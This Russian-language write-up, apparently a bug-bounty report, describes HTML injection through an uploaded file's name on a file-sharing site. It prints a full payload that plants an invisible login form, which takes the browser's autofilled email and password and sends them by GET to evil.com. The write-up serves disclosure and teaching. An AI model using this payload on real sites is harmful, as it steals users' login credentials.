Использование функции автозаполнения для кражи учетных данных

HTML инъекция

Каждый мой ввод на этом сайте был корректно обработан приложением и потому мое внимание привлекла функция загрузки файлов. Мы можем загружать файлы, и есть общедоступная ссылка, которой мы можем поделиться с другими людьми, чтобы они тоже увидели мой файл. Я попытался обойти проверку расширения файла при загрузке, используя .svg, .html, .php, но мне не повезло. А затем я переименовал свой файл в <h1>xd.jpg и открыл его по общедоступной ссылке. Из-за имени файла произошла HTML-инъекция.

Итак, теперь у нас есть HTML-инъекция, следующая часть - это функция автосохранения.

Автозаполнение

В основном, когда мы сохранили учетные данные для входа в нашем браузере и хотим снова войти на сайт, браузер автоматически заполняет поле логина и пароля, а нам просто нужно нажать на кнопку логина (входа).

Поэтому я создал форму входа и сделал поле адреса электронной почты и пароля невидимыми, установив opaсity:0 в CSS, а мое окончательное имя файла выглядело так:

"><form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="submit"><!--.jpg

Здесь я могу получить общедоступную ссылку на загруженный мной файл.

Так выглядит страница после посещения общедоступного URL-адреса моего загруженного файла.

Когда кто-либо нажимает на кнопку submit, его учетные данные для входа отправляются на сервер злоумышленника.

Итак, как это работает? Поля ввода заполняются автоматически благодаря функции автосохранения, а style="opacity:0;" скроет детали, отображаемые на странице. При нажатии submit информация автоматически отправляется на evil.com, из-за установки METHOD='GET' учетные данные для входа будут отправлены c GET запросом на evil.com, который является доменом злоумышленника. Последние символы <!-- закомментируют оставшийся HTML.